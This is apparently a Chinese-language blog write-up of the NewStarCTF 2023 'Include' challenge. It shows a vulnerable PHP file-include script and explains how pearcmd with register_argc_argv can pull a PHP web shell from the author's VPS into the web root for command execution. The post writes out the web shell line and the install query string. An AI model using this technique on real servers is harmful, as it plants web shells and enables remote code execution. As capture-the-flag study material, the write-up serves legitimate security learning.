[NewStarCTF 2023 公开赛道]Include 🍐

2025-02-02- 2025-02-21

186- 1m- -

刷题笔记-pearcmd

[NewStarCTF 2023 公开赛道]Include 🍐

一眼看去，有提示我们看phpinfo.php

<?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?>

我们访问，在flag处发现提示

提示我们检查register_argc_argv，我们发现register_argc_argv配置是打开的，那我们就可以通过pear命令进行任意文件读取

1 2	<?php echo '<?php system($_GET[0]);';

我们在vps上上传恶意文件

1	?f=pearcmd&+install+-R+/var/www/html+http://ip:port/eval.php

然后我们访问/tmp/pear/download/evil.php直接命令执行即可

得到flag

参考

register_argc_argv与include结合

Post author: kinsey
Post link: https://kinseyy.github.io/2025/02/02/NewStarCTF-2023-%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-Include-%F0%9F%8D%90/
Copyright Notice: All articles in this blog are licensed under unless otherwise stated.